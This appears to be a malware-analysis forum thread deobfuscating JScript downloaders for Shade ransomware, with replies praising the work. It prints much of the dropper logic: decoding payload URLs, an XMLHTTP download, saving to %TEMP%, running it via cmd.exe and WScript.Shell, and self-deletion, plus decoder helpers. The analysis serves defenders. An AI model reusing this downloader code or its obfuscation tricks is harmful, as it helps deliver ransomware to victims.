Payload : shade ransomware , extension : .NO_MORE_RANSOM

начисления_xls.js

URLs :

- http ://grandfather.com/wp-content/themes/divi-child/helpsys.exe
- http ://agxlogistics.com/modules/mod_araticllws/helpsys.exe

=> Payload no longer available

"cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad00969.tmp"

=> remember this is a random name returned by GetTempName function

  • The main difference with Документы и декларация на товар 11222016.js
The function called in the if part (remember, the main part)

function A(OAa)
{

var Z = eval("ActiveXObject");
var temp = Yx();

=> "ADODB.Recordset" (and not "ADODB.Stream")
var QWi = new Z(Yx());

=> QWi = ActiveXObject("ADODB.Recordset")
=> Creates an ActiveX object : ADO Recordset

"The ADO Recordset object is used to hold a set of records from a database table. A Recordset object consist of records and columns (fields)"

details : ADO Recordset Object

var ach = rT();

=> ach = "object"
var cY="";
cY=cY+G(58+58)+G(75+34)+G(7738/73+0)+G(15+94)+G(10*11)+G(59*2)+G(5668/52+0);

=> "unknown" (here, the function G is similar to the J function of previous sample)
var Rd = cY;
var E = (typeof QWi[iHx()] == ach);

=> iHx() : "fields"
=> is typeof QWi["fields"] == "object" ?

=> We have seen that: QWi = ActiveXObject("ADODB.Recordset")

=> var E = true if running under the good environment
=> the string cY, "unknown", is not used ! They forgot to delete this part, when modifying the script !?
return E;

=> true or false : result of the above test : true if under the good environment.
}
 

AtlBo

Dec 29, 2014
I see malware writers/hackers are not programmers after all. They are puzzle makers!

So may I assume the puzzle is to avoid detection and not for the amusement of our puzzle solver DardiM? I am very new to reading script, although I can "follow" your analyses. I am not a programmer.

Really outstanding effort and work decoding this puzzle. I hope it inspires some would be security programmers.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I see malware writers/hackers are not programmers after all. They are puzzle makers!

So may I assume the puzzle is to avoid detection and not for the amusement of our puzzle solver DardiM? I am very new to reading script, although I can "follow" your analyses. I am not a programmer.

Really outstanding effort and work decoding this puzzle. I hope it inspires some would be security programmers.
Thanks :)

So may I assume the puzzle is to avoid detection
Yes, that is completely the right reason :)
=> the fewer understandable "strings" / parts there are (some well known), the less easy it will be for static detection (heuristic, or human analysis)
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Another sample from the same family.
These samples are very long puzzles, if we go into the details of each part.
That is why I will now only show the important parts / results (please, refresh your memory by reading the previous posts about how it works)

1) The Main part :

The main decoder function : Eo( encoded_string , password)

=> remember this function name :)

  • if (wbn())
=> calls the function that will test if we are under the wanted environment
{
  • var cNQ = [];
=> creates the empty tab for the future URLs : they are currently encoded.
// declaration of a function that will decode the first URL
function fW() {
var RU=Eo("30473C13437A691512431B042B59250425355A3C061D7B25161E191A14364C3A012276563006","X3HcyUFys6imE8MhL");
return RU;
}

  • cNQ[eval("0")] = fW();
=> eval("0") => 0 = index used to put the result of the fW() call

=> cNQ[0] = URL1 => put in the tab, at index 0, the first URL where to download the payload from.

URL1 : hxxp://laurinahlimited.com/systwin.exe

// declaration of the function that will give the password to be used by the main decoder
function NW() {
var bk = "";
bk=bk+uHh(6527/61-0)+uHh(303/3-0)+uHh(65+17)+uHh(65+12)+uHh(36*3)+uHh(7738/73-0)+uHh(43*2)+uHh(11*11)+uHh(936-856)+uHh(13+55)+uHh(3952/76-0);
return bk;
}
// declaration of the function that will give the index used to store the second decoded URL
function eeN() {
var zBP=Eo("5D",NW());
return zBP;
}
// declaration of the function that will give the password to be used by the main decoder
function UM() {
var gFP = "";
gFP=gFP+uHh(728-640)+uHh(29+77)+uHh(3888/81-0)+uHh(301-185)+uHh(3381/69+0)+uHh(8888/88+0)+uHh(748-661)+uHh(391-286)+uHh(31+39)+uHh(218-154)+uHh(597-542)+uHh(41+80)+uHh(3*23)+uHh(97)+uHh(27+46)+uHh(79)+uHh(84+1);
return gFP;

=> "Yk1u2fXjGA8zFbJPV"
}
// declaration of a function that will decode the second URL used, using the password returned by UM()
function lo() {
var jI=Eo("311F4505084977072E2D590C2F16393164684543001D1521193336511468073235",UM());
return jI;
}

  • cNQ[eval(eeN())] = lo();
=> calls lo() => second URL => put this URL in the tab of URLs cNQ, at the index given by eeN() : return 1

UrL2 : hxxp://milavitsa21.ru/systwin.exe
  • var yk = false;
=> will be used on the while loop (where the different URLs can be used to download, save, run, the payload)
=> The while loop will only stop as soon as this value is true, because of the if ( ! yk ) test => ! false => not false => continues

// declaration of a function that returns 1
function Ys() {
var eT=423;
var Kjz=eT+4659;
var ShW=Kjz/42;
var oq=ShW-120;
return oq+0;

=> returns 1
}

// declaration of a function that returns 0
function KkN() {
var Uce=201392;
var HsR=Uce+7285;
var z=HsR/399;
var Nu=z-523;
return Nu+0;

=> returns 0
}
  • var Et = Ys(), tO = KkN();
=> Et =1
=> tO = 0


After these parts : URLs are decoded : main loop to retrieve the payload, save it, run it.

while (!yk)
{

if (tO > Et)
break;

// declaration of a function that returns "86_64" !?
function bOI() {
var JXJ=Eo("766C115776","NZNaBqBm4aZ4FpO");
return JXJ;

}
var EX = bOI();

=> "86_64" : not used !?
yk = nK(cNQ[tO], false);

=> the most important part : nK(current_URL , false)

=> Call the function with the URL as parameter 1

=> there is then no clue in the current main part of what will be made.
tO++;
}
}

var teMDEZbnTnBmTpv = 784973;

=> useless

We have already seen that this family is like a very BIG puzzle : each function call can call several functions that call functions that return and call other functions that call several functions ... with decoder, password, obfuscated password, obfuscated encoded string...
=> I think with this sentence you know what I mean :)

I have already got into details on previous samples.

2) I Will now just show some parts !

2.1 ) The charCode decipher :

We have seen several calls of uHh function.

uHh(6527/61-0)+uHh(303/3-0)+uHh(65+17)+uHh(65+12)+uHh(36*3)+uHh(7738/73-0)+uHh(43*2)

=> Now, try to remember the previous samples :

=> There was a very obfuscated function whose purpose was to make :

- from charCode => String.FromCharCode(charcode+1)

- example char "B" => its charCode : 66 => 66 + 1 => 67 => convert as string => "C" (click on ALT+67 => "C")

It was the J() function in first sample, that called several functions that call several functions, etc ....

Let's see the uHh function : is it the same technique ? And are the operations and the result the same ?

  • uHh calls another function to make its job :

function rbM(KK)
{

var H = "c" + "h" + "" + "a" + "" + "";
var Cpf = "" + "" + "" + "r" + "" + "A" + "" + "t";
return H + "" + Cpf;
}

=> it is easy to understand it returns "charAt" => a string that represents a function used to get the char at one index in a string (index begins at 0)
Example :

"123456".charAt(2)
=> 3 !!! Because indices are from 0 to length - 1 : here from 0 to 5 : 6 chars !!!
=> index 2 => 3rd char
function uHh(vF)
{

var W = " !\"#" + "$%&" + "'()*+,-./012" + "345678" + "9:;<=>?@" + "ABC" + "DEFG";
W = W + "HIJKLMN" + "OPQRSTUVWX" + "YZ[\\]^_`abc" + "defghijk" + "lmnopqr" + "stuvwxy" + "z{|}~";
var q=37561;
var GnM=q+29960;
var lLX=GnM/317;
var AHe=lLX-182;
return W[rbM(vF)](vF-AHe);
}

=> W :
" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
=> AHe : 31
=> vF : the parameter

W[rbM(vF)](vF-AHe);

=> long_string["charAt"](parameter - 31)

=> it retrieves the char from the long string, using the value_as_parameter - 31

Example :

uHh(6527/61-0)

=> 6527/61 : write this way to obfuscate the real value
=> 107 (= "k")

=> long_string["charAt"](107- 31)
=> long_string["charAt"](76)

=> "j" !!!
- They use an obfuscated method that is similar to :
charCode => charCode -1 => String.fromCharCode()(charCode -1)
"B" charCode : => "A"
- Previous J() was => J(charCode) =>String.fromCharCode()(value+1)

Their new method :

uHh(charCode) => LIKE :String.fromCharCode()(value-1)

but retrieving the char from a string they have hard coded, after subtracting 31 from the charCode
Example :

uHh(2900/58-0)+uHh(735/15+0)+uHh(3995/85-0)+uHh(3*23)+uHh(1040-993)+uHh(76-12)+uHh(19+31)+uHh(18*3)+uHh(537-486)+uHh(16+48)+uHh(32+15)+uHh(396-330)+uHh(55-7)+uHh(1734/34-0)+uHh(53)+uHh(242-195)+uHh(53)+uHh(12+35)+uHh(815-768)+uHh(2968/53-0)+uHh(4692/92-0)+uHh(146-79)+uHh(413-366)+uHh(4*13)+uHh(698-649)+uHh(3825/75+0)+uHh(2401/49-0)+uHh(4*17)+uHh(28+24)+uHh(4209/61+0)+uHh(36+14)+uHh(10*5);

uHh(2900/58-0)

=> uHh(19) : 50 => "2"

50 - 31 = 19 => index => from the string => char number 20 : "3"

=> same result with String.fromCharCode()(50+1)
=> "320F0A374A0C146060094D05242E5F33"
Conclusion :

- they have simplified a lot their charCode decipher method.
- it now subtracts 31 from the value, to get a char from a string.

=> it seems that their string has, in the right order, all chars from the blank char to the ~ char

Let's try

They use:

" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
I obtained on this MT editor with ALT+ charCode, beginning from ALT+32 :

" !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"'

=> first char : blank char
=> \\ put for the interpreter => \
=> \" put for the interpreter => "
With the string they used, it gives the same result as :

charCode => String.fromCharCode(value+1)
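As an added example (not code from the post or from the samples), here is a small helper in JavaScript that applies what the last two sections established: it rebuilds the uHh() / J() character table, evaluates the arithmetic arguments without eval(), and resolves the four-line constant ladders (var a=N; var b=a+M; var c=b/K; var d=c-L;) used throughout the samples. The chains and ladders inside it are copied from this thread; the table is the one quoted just above.

```javascript
// Added example, not code from the post or from the samples: a helper for the
// two building blocks this thread keeps meeting.
//  1. uHh(expr)+uHh(expr)+... (J(expr) in the first sample) builds a string one
//     character at a time; both map a value v to String.fromCharCode(v + 1).
//  2. var a=N; var b=a+M; var c=b/K; var d=c-L; ladders hide a small constant
//     (200 for the HTTP status, 0 and 1 for flags, 7 and 5 for the recursion).
// Nothing here calls eval(): the arithmetic is parsed and evaluated by hand.

// Character table quoted in the post: printable ASCII from " " (32) to "~" (126),
// so TABLE[v - 31] is the same character as String.fromCharCode(v + 1).
const TABLE = Array.from({ length: 95 }, (_, i) => String.fromCharCode(32 + i)).join("");

// Evaluate an argument such as "6527/61-0" or "65+17". Only integers and + - * /
// are accepted, with the usual precedence (* and / before + and -).
function evalArith(expr) {
  const clean = expr.replace(/\s+/g, "");
  if (!/^\d+([+\-*\/]\d+)*$/.test(clean)) throw new Error("unexpected argument: " + expr);
  const tokens = clean.match(/\d+|[+\-*\/]/g);
  const terms = [Number(tokens[0])]; // additive terms after collapsing * and /
  const signs = [];                  // operator between terms[i-1] and terms[i]
  for (let i = 1; i < tokens.length; i += 2) {
    const op = tokens[i];
    const rhs = Number(tokens[i + 1]);
    if (op === "*") terms[terms.length - 1] *= rhs;
    else if (op === "/") terms[terms.length - 1] /= rhs;
    else { signs.push(op); terms.push(rhs); }
  }
  return terms.reduce((acc, t, i) => (signs[i - 1] === "-" ? acc - t : acc + t));
}

// Decode one chain such as 'bk=bk+uHh(6527/61-0)+uHh(303/3-0)'. Any function
// name is accepted, so J(...) chains from the first sample decode the same way.
function decodeCharChain(chain) {
  let out = "";
  for (const m of chain.matchAll(/[A-Za-z_$][\w$]*\(([^()]*)\)/g)) {
    const v = evalArith(m[1]);
    if (!Number.isInteger(v) || v < 31 || v > 125) {
      throw new Error("value " + v + " falls outside the table (31..125)");
    }
    out += TABLE[v - 31];
  }
  return out;
}

// Resolve every "var name = expr;" of a ladder in order, substituting the
// variables already seen, and return a Map name -> value. The last entry is the
// constant the script really uses. The ladders in these samples only ever
// produce integers; a non-integer step is reported instead of silently kept.
function resolveLadder(src) {
  const vars = new Map();
  for (const m of src.matchAll(/var\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]+);/g)) {
    const expr = m[2].replace(/[A-Za-z_$][\w$]*/g, (name) => {
      if (!vars.has(name)) throw new Error("unresolved variable " + name);
      return String(vars.get(name));
    });
    const v = evalArith(expr);
    if (!Number.isInteger(v)) throw new Error("non-integer step " + m[1] + " = " + v);
    vars.set(m[1], v);
  }
  return vars;
}

// Inputs copied from the analysis above.
const UM_CHAIN = "gFP=gFP+uHh(728-640)+uHh(29+77)+uHh(3888/81-0)+uHh(301-185)+uHh(3381/69+0)"
  + "+uHh(8888/88+0)+uHh(748-661)+uHh(391-286)+uHh(31+39)+uHh(218-154)+uHh(597-542)"
  + "+uHh(41+80)+uHh(3*23)+uHh(97)+uHh(27+46)+uHh(79)+uHh(84+1);";
const CMD_CHAIN = "Ep=Ep+J(3626/37-0)+J(1108-1000)+J(44+55)+J(2475/55+0)+J(23+77)+J(5355/45+0)"
  + "+J(2100/21-0)+J(21+10)+J(3036/66-0)+J(2548/26-0)+J(1984/64-0);";
const STATUS_LADDER = "var Xdq=412883;\nvar leM=Xdq+43957;\nvar Gcb=leM/405;\nvar NC=Gcb-928;";
const STOP_LADDER = "var Jnf=279668;\nvar EQQ=Jnf+15258;\nvar HB=EQQ/478;\nvar ubH=HB-610;";

console.log(decodeCharChain(UM_CHAIN));                  // Yk1u2fXjGA8zFbJPV
console.log(JSON.stringify(decodeCharChain(CMD_CHAIN))); // "cmd.exe /c "
console.log(resolveLadder(STATUS_LADDER).get("NC"));     // 200
console.log(resolveLadder(STOP_LADDER).get("ubH"));      // 7
```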
2.2) Following the function that uses the URLs :

From the while loop we have seen a function that is called with the current URL (two available) :

=> nK(current_URL , false)

this function uses : var yd = gxi(ftP);

with ftP :
current_URL

Code:
function gxi(cNQ)
{
    var Nlb="";
    Nlb=Nlb+uHh(62+25)+uHh(51+27)+uHh(88+9)+uHh(8085/77+0)+uHh(5700/57-0)+uHh(361-263)+uHh(74+41);
    var VQ = vZ(Nlb);

    var UGD = zAl(VQ);
    var prv = ZQ(VQ);
    var owA="";
    owA=owA+uHh(1077-995)+uHh(508-410)+uHh(113)+uHh(21+83)+uHh(3*37)+uHh(830-715)+uHh(6968/67-0)+uHh(785-676)+uHh(38+64)+uHh(417-372)+uHh(20+49)+uHh(54+50)+uHh(107)+uHh(33+67)+uHh(57+25)+uHh(30+90)+uHh(95+19)+uHh(717-602)+uHh(29+71)+uHh(8208/76-0)+uHh(5382/69+0)+uHh(97)+uHh(10290/98+0)+uHh(20*5)+uHh(14*7)+uHh(110+5);
    var rp = new VQ(owA);
    if (ZYh(prv, cNQ) == 0)
        return false;

    var ME="";
    ME=ME+uHh(598-516)+uHh(31+84)+uHh(5376/56+0)+uHh(8740/76-0)+uHh(626-510)+uHh(6*19);
    var Br = prv[ME];
    var Is=495352;
    var OLF=Is+5272;
    var hu=OLF/536;
    var dv=hu-734;
    var DFF = dv;

    if (Br == DFF) {
        var TZj="";
        TZj=TZj+uHh(345-281)+uHh(2613/39-0)+uHh(1077-999)+uHh(60+7)+uHh(1061-996)+uHh(0+45)+uHh(57+25)+uHh(73+42)+uHh(113)+uHh(416-316)+uHh(32*3)+uHh(36*3);
        var NCu = new VQ(TZj);
        var Xlf = Ds(rp);
        var ZM="";
        ZM=ZM+uHh(1035-957)+uHh(560-449)+uHh(469-369)+uHh(700-591);
        NCu[ZM]();
        var bW="";
        bW=bW+uHh(1992/24-0)+uHh(20+100)+uHh(30+81)+uHh(20*5);
        var ghg=497350;
        var GI=ghg+15225;
        var myj=GI/725;
        var Rc=myj-706;
        NCu[bW] = Rc;

        var Ak="";
        Ak=Ak+uHh(5751/71+0)+uHh(10+90)+uHh(8892/78+0)+uHh(3*37)+uHh(10*11)+uHh(109)+uHh(9462/83+0)+uHh(312-212)+uHh(5*13)+uHh(63+47)+uHh(8217/83-0)+uHh(19+101);
        var vtX = prv[Ak];
        var Ppc="";
        Ppc=Ppc+uHh(73+13)+uHh(94+19)+uHh(8*13)+uHh(921-806)+uHh(89+11);
        NCu[Ppc](vtX);
        var kDL="";
        kDL=kDL+uHh(79)+uHh(876-766)+uHh(4674/41-0)+uHh(5408/52+0)+uHh(827-712)+uHh(8*13)+uHh(7700/70-0)+uHh(1013-904);
        var QV=108962;
        var DUj=QV+31198;
        var QZ=DUj/219;
        var AxG=QZ-640;
        NCu[kDL] = AxG;
        if (!Gg(NCu, Xlf, VQ))
            return false;

        var jgi="";
        jgi=jgi+uHh(2310/35+0)+uHh(15+92)+uHh(20+90)+uHh(93+21)+uHh(884-784);
        NCu[jgi]();
        var Bq="";
        Bq=Bq+uHh(14*7)+uHh(36*3)+uHh(805-706)+uHh(9*5)+uHh(12+88)+uHh(2975/25+0)+uHh(1034-934)+uHh(2759/89+0)+uHh(2*23)+uHh(10+88)+uHh(23+8);
        var nP = Bq + Xlf;
        var mH=48776;
        var OZ=mH+48065;
        var dad=OZ/113;
        var Yu=dad-857;
        var J = Yu;
        var mcq="";
        mcq=mcq+uHh(32*3)+uHh(4104/36+0)+uHh(7280/65-0)+uHh(36*3)+uHh(99+10)+uHh(9*11)+uHh(216-102)+uHh(87+18)+uHh(103)+uHh(24*5)+uHh(3402/63-0)+uHh(60+36)+uHh(6*17)+uHh(5353/53-0)+uHh(964-850)+uHh(133-34)+uHh(4532/44+0)+uHh(11+90)+uHh(78+36);
        var zY="";
        zY=zY+uHh(29+19)+uHh(2352/49+0)+uHh(22+27)+uHh(10*5);
        J = mn(mcq, VQ, nP, zY);

        var vk=426269;
        var gsu=vk+5797;
        var FkT=gsu/673;
        var Tp=FkT-632;
        var TAk = Tp;
        if (J < TAk)
        {
            return EB(rp);
        }
        else
        {
            return false;
        }

    }
    else {
        return false;
    }
    return true;
}
What it does :

- decodes some parts with the two functions we have seen : Eo and uHh
- builds the important objects

var UGD = zAl(VQ);

=> new ActiveXObject("Wscript.Shell") : to run the payload
var prv = ZQ(VQ);

=> new ActiveXObject("MSXML2.XMLHTTP") : to make the http request
var owA="";
owA=owA+uHh(1077-995)+uHh(508-410)+uHh(113)+uHh(21+83)+uHh(3*37)+uHh(830-715)+uHh(6968/67-0)+uHh(785-676)+uHh(38+64)+uHh(417-372)+uHh(20+49)+uHh(54+50)+uHh(107)+uHh(33+67)+uHh(57+25)+uHh(30+90)+uHh(95+19)+uHh(717-602)+uHh(29+71)+uHh(8208/76-0)+uHh(5382/69+0)+uHh(97)+uHh(10290/98+0)+uHh(20*5)+uHh(14*7)+uHh(110+5);


=> decoded : "Scripting.FileSystemObject"
var rp = new VQ(owA);

=> new ActiveXObject("Scripting.FileSystemObject") : to manipulate file / folder
if (ZYh(prv, cNQ) == 0)
return false;
=> returns false if it failed

// Details
function ZYh(RX, ftP)
{

=> RX : is prv created above : http object
=> ftP: is the current URL (remember there are two URL available)

var lm=["9Vi","x6","odG","O","rrt","Bq","u","Q8","D8F"];
var mJ=lm[0]+lm[7]+lm[8]+lm[5]+lm[2]+lm[1]+lm[6]+lm[4]+lm[3];

=> "9ViQ8D8FBqodGx6urrtO" password to be used with the Eo decoder
var pOx=2081;
var ark=pOx+24803;
var TX=ark/52;
var Jl=TX-517;

=> Jl = 0;
RX[Eo("28451023","G5uM3YmVWOIBp")](Eo("7E133D",mJ), ftP, Jl);

=> Eo("28451023","G5uM3YmVWOIBp")

=> "open"
=> Eo("7E133D",mJ) => Eo("7E133D","9ViQ8D8FBqodGx6urrtO")

= > "GET"
=> http.open ("GET", URL, 0)

=> opens a connection to the URL
try {

RX[Eo("43261811","0CvugaaWl9")]();

=> Eo("43261811","0CvugaaWl9")

=> "send"
=> tries to send the request
} catch (rd) {
return 0;

=> returns 0 if an error occurred
}
return 1;

=> returns 0 if no error occurred
}
var ME="";
ME=ME+uHh(598-516)+uHh(31+84)+uHh(5376/56+0)+uHh(8740/76-0)+uHh(626-510)+uHh(6*19);

=> "status" => will be used to test the status of the request
var Br = prv[ME];

=> retrieve the status value : http["status"]

=> http.status : 200 if OK, 404 if page not found, etc
var Is=495352;
var OLF=Is+5272;
var hu=OLF/536;
var dv=hu-734;
var DFF = dv;

=> obfuscated way to get 200
if (Br == DFF) {

=> it means the request was successful (good data received from the URL)

var TZj="";
TZj=TZj+uHh(345-281)+uHh(2613/39-0)+uHh(1077-999)+uHh(60+7)+uHh(1061-996)+uHh(0+45)+uHh(57+25)+uHh(73+42)+uHh(113)+uHh(416-316)+uHh(32*3)+uHh(36*3);

=> "ADODB.Stream"
var NCu = new VQ(TZj);

=> new ActiveXObject("ADODB.Stream") : creates a stream object to put the data received from the http request
var Xlf = Ds(rp);

=> function that

- creates : "\\rad256D7.tmp" : random name using GetTempName( )
- uses CreateObject("WScript.Network") :

=> provides access to the shared resources on the network to which your computer is connected
retrieves "UserDomain" and tests if it is a string

then :

- uses GetSpecialFolder(2) : %TEMP% and builds the payload's complete path

Example :
"C:\Users\DardiM\AppData\Local\Temp\rad256D7.tmp"
var ZM="";
ZM=ZM+uHh(1035-957)+uHh(560-449)+uHh(469-369)+uHh(700-591);

=> "open"
NCu[ZM]();

=> stream.open()
=> opens the stream object to be able to manipulate it
var bW="";
bW=bW+uHh(1992/24-0)+uHh(20+100)+uHh(30+81)+uHh(20*5);

=> "Type"
var ghg=497350;
var GI=ghg+15225;
var myj=GI/725;
var Rc=myj-706;

=> Rc : 1
NCu[bW] = Rc;

=> stream["Type"] = 1 => binary
var Ak="";
Ak=Ak+uHh(5751/71+0)+uHh(10+90)+uHh(8892/78+0)+uHh(3*37)+uHh(10*11)+uHh(109)+uHh(9462/83+0)+uHh(312-212)+uHh(5*13)+uHh(63+47)+uHh(8217/83-0)+uHh(19+101);

=> "ResponseBody"
var vtX = prv[Ak];

=> vtX = http.ResponseBody : the data received
var Ppc="";
Ppc=Ppc+uHh(73+13)+uHh(94+19)+uHh(8*13)+uHh(921-806)+uHh(89+11);

=> "Write"
NCu[Ppc](vtX);

=> stream["Write"](data_received)
=> puts the data received in the stream (remember it is in memory)
var kDL="";
kDL=kDL+uHh(79)+uHh(876-766)+uHh(4674/41-0)+uHh(5408/52+0)+uHh(827-712)+uHh(8*13)+uHh(7700/70-0)+uHh(1013-904);


=> "position"
var QV=108962;
var DUj=QV+31198;
var QZ=DUj/219;
var AxG=QZ-640;
NCu[kDL] = AxG;

=> stream.position = 0
=> puts the pointer at position 0
if (!Gg(NCu, Xlf, VQ))
return false;

=> calls Gg(stream, Path , object_to_create_object)

Does some stuff, but the main job :

=> stream["SaveToFile"](Path )

=> saves the payload to the PC
Example : "C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp"
var jgi="";
jgi=jgi+uHh(2310/35+0)+uHh(15+92)+uHh(20+90)+uHh(93+21)+uHh(884-784);

=> "Close"
NCu[jgi]();

=> stream["close"]() => closes the stream object
var Bq="";
Bq=Bq+uHh(14*7)+uHh(36*3)+uHh(805-706)+uHh(9*5)+uHh(12+88)+uHh(2975/25+0)+uHh(1034-934)+uHh(2759/89+0)+uHh(2*23)+uHh(10+88)+uHh(23+8);

=> "cmd.exe /c "
var nP = Bq + Xlf;
var mH=48776;
var OZ=mH+48065;
var dad=OZ/113;
var Yu=dad-857;
var J = Yu;
var mcq="";

mcq=mcq+uHh(32*3)+uHh(4104/36+0)+uHh(7280/65-0)+uHh(36*3)+uHh(99+10)+uHh(9*11)+uHh(216-102)+uHh(87+18)+uHh(103)+uHh(24*5)+uHh(3402/63-0)+uHh(60+36)+uHh(6*17)+uHh(5353/53-0)+uHh(964-850)+uHh(133-34)+uHh(4532/44+0)+uHh(11+90)+uHh(78+36);

=> "asqmndsjhy7agfsdhfs"
=> if you remember the first sample, it is a string used in a recursive function, that will finally build the right vars and call the right run function
var zY="";
zY=zY+uHh(29+19)+uHh(2352/49+0)+uHh(22+27)+uHh(10*5);

=> "1123"
J = mn(mcq, VQ, nP, zY);

=> the function that will run the payload

=> return hkG(hsb, t, PcU, UVS);

=> return hkG(25, ActiveXObject , cmd_for_the_run, "run");

Example :

"cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp"
function hkG(wvj, t, PcU, UVS)
{

var T=237014;
var JE=T+279;
var oVt=JE/311;
var zV=oVt-763;
var s = zV;
if (wvj > s)
{

wvj = s;
}
var Gy=["J","ft","A7","M8","kY","F8J","RMc","8","X","e"];
var Wy=Gy[1]+Gy[9]+Gy[4]+Gy[5]+Gy[3]+Gy[7]+Gy[8]+Gy[6]+Gy[2]+Gy[0];
var r = Eo("1513010131274B2D255C52",Wy);
r = new t(Eo("1C3A2F3800223B793932292725","KILJiROWjZL"));

=> new ActiveXObject("Wscript.Shell")
r[UVS](PcU, wvj);

=> shell.run is used here !

Example :

=> r["run"]( "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad6AF2B.tmp", 0);
var bAJ=236943;
var K=bAJ+15777;
var hKK=K/585;
var uo=hKK-424;
var Vvx = uo;
return Vvx;
}
var vk=426269;
var gsu=vk+5797;
var FkT=gsu/673;
var Tp=FkT-632;
var TAk = Tp;
if (J < TAk)
{

return EB(rp);

function EB(Cj, ym)
{
var Dk = eval(Eo("601B0B105E463C","7Hhb76HhB8KVzROI"));

=> eval("WScript")

=> Dk : object WScript
var yF = Dk[Eo("3915141A333533040403190A382B","jvfsCAuqhoWkUN2")];

=> yF = WScript["ScriptFullName"]

=> get the current running script full name : complete path+ name

Example :

=> "C:\Users\DardiM\Desktop\\13012017_22\\¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js"
var Zz="";
Zz=Zz+uHh(11*11)+uHh(42+10)+uHh(48+35)+uHh(6560/80+0)+uHh(7+113)+uHh(647-530)+uHh(890-813)+uHh(877-792)+uHh(3102/66+0)+uHh(67+49)+uHh(4664/44+0)+uHh(883-785)+uHh(53*2)+uHh(904-855);

=> "deleteFile"
Cj[Eo("1E5038360D13083F5C10",Zz)](yF);

=> FileSystemObject object is used (was created at the top of this part)

=> fso["deleteFile"](script_path)

=> it deletes the current running script file
return true;
}
}
else
{

return false;
}
}
else {
return false;
}

return true;
}
3) Remarks :

- Some modifications compared to previous version.

- The URLs used in this post don't work anymore

- hxxp://laurinahlimited.com/systwin.exe
- hxxp://milavitsa21.ru/systwin.exe

- I have not shown sub-functions when no method changes have been made
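A small deobfuscation helper for the string-hiding tricks walked through above: the uHh(...) chains, the Eo(hex, key) XOR strings, and the "var a=...; var b=a+...;" arithmetic chains that hide constants such as 200. This is an added example, not code from the post or from the sample; it assumes uHh(n) behaves as String.fromCharCode(n + 1) (the only offset consistent with the decoded values shown), and the helper names safe_arith, decode_uhh, decode_eo and fold_chain are mine.

```python
import ast
import operator
import re

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}

def safe_arith(expr):
    """Evaluate constant arithmetic like '4104/36+0' via ast, never eval()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression: %r" % expr)
    return walk(ast.parse(expr.strip(), mode="eval").body)

def decode_uhh(line):
    """Rebuild the string hidden in a chain of uHh(<expr>) calls.

    Assumption: uHh(n) behaves as String.fromCharCode(n + 1); that is the only
    offset under which uHh(345-281) gives 'A' and uHh(2613/39-0) gives 'D'.
    """
    return "".join(chr(int(safe_arith(e)) + 1)
                   for e in re.findall(r"uHh\(([^()]+)\)", line))

def decode_eo(hex_text, key):
    """Eo(hex, key): byte i of the hex string XORed with key character i."""
    return "".join(chr(b ^ ord(key[i])) for i, b in enumerate(bytes.fromhex(hex_text)))

def fold_chain(js):
    """Resolve a 'var a=...; var b=a+...;' chain to the value of its last variable."""
    env, last = {}, None
    for name, expr in re.findall(r"var\s+(\w+)\s*=\s*([^;]+);", js):
        expr = re.sub(r"[A-Za-z_]\w*", lambda v: str(env[v.group(0)]), expr)
        env[name] = safe_arith(expr)
        last = name
    return env[last]

# Constructed inputs: copied from the sample lines quoted in the post.
STREAM_LINE = ("TZj=TZj+uHh(345-281)+uHh(2613/39-0)+uHh(1077-999)+uHh(60+7)"
               "+uHh(1061-996)+uHh(0+45)+uHh(57+25)+uHh(73+42)+uHh(113)"
               "+uHh(416-316)+uHh(32*3)+uHh(36*3);")
STATUS_CHAIN = "var Is=495352; var OLF=Is+5272; var hu=OLF/536; var dv=hu-734;"

if __name__ == "__main__":
    print(decode_uhh(STREAM_LINE))                 # ADODB.Stream
    print(decode_eo("28451023", "G5uM3YmVWOIBp"))  # open
    print(fold_chain(STATUS_CHAIN))                # 200.0
```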
 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
DardiM said:
"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75
=> 63 XOR 75 = 116 => "t"
current decoded string : "htt"
etc,...
RESULTS :


cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"
WE();

=> "http ://dipudevaraj.com/deklar_11222016.exe"



This is amazing fun to decode! Thank you for another fun puzzle!

Each time you make an updated summary, I go back to the old one for reference and find new things I missed the first time reading it.

DardiM
Svoll said:
DardiM said:
"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75
=> 63 XOR 75 = 116 => "t"
current decoded string : "htt"
etc,...
RESULTS :


cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"
WE();

